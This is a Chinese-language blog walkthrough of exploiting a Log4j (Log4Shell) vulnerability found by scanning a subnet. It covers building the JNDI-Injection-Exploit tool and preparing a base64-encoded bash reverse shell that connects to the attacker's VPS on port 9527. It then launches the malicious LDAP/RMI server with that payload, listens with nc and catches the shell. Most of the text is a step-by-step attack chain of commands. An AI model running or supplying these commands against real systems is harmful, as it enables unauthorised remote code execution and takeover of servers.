最近又是领导的任务,上来就给了一个C段啥也没给。
那就只能祭出awvs扫扫扫了,结果还真扫出来一个Log4j,心中大喜,这波稳了。
正片开始
先上dnslog
老规矩测一下dnslog,果不其然有回显。
准备JNDI注入工具
此过程将源码打包,需要java和mvn环境
1、java安装
参考此篇文章
https://blog.8owe.com/509.html
2、mvn安装
下载源码文件
https://maven.apache.org/download.cgi
随后解压文件
tar -zxvf apache-maven-3.8.5-bin.tar.gz //此文件可能版本不同,请不要完全复制
解压完成后配置环境变量
vi /etc/profile
# 最后追加这两行
export MAVEN_HOME=/root/apache-maven-3.8.5
export PATH=$MAVEN_HOME/bin:$PATH
# 重新加载配置文件
source /etc/profile
操作完后执行mvn -v,如果有回显就证明配置完成
Apache Maven 3.8.5 (3599d3414f046de2324203b78ddcf9b5e4388aa0)
Maven home: /root/apache-maven-3.8.5
Java version: 1.8.0_322, vendor: Red Hat, Inc., runtime: /usr/lib/jvm/java-1.8.0-openjdk- 1.8.0.322.b06-1.el7_9.x86_64/jre
Default locale: en_US, platform encoding: UTF-8
OS name: "linux", version: "3.10.0-1160.53.1.el7.x86_64", arch: "amd64", family: "unix"
3、下载Exp
git clone https://gitee.com/Lemon_i/JNDI-Injection-Exploit.git
进入目录打包
mvn clean package -DskipTests
4、准备反弹shell
反弹shell有很多种,这里博主选择最简单的bash反弹
payload:
bash -i >& /dev/tcp/VPS IP/9527 0>&1
base64编码:
YmFzaCAtaSA+JiAvZGV2L3RjcC9WUFMgSVAvOTUyNyAwPiYx
5、进入target目录利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar开启ldap环境
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9WUFMgSVAvOTUyNyAwPiYx}|{base64,-d}|{bash,-i}" -A "VPS IP"
jndi生成payload
rmi://VPS IP:9527/ExploitBypass
6、开启监听
nc -lvvp 9527
7、添加payload到数据包并重放
8、nc收到反弹shell
点到为止。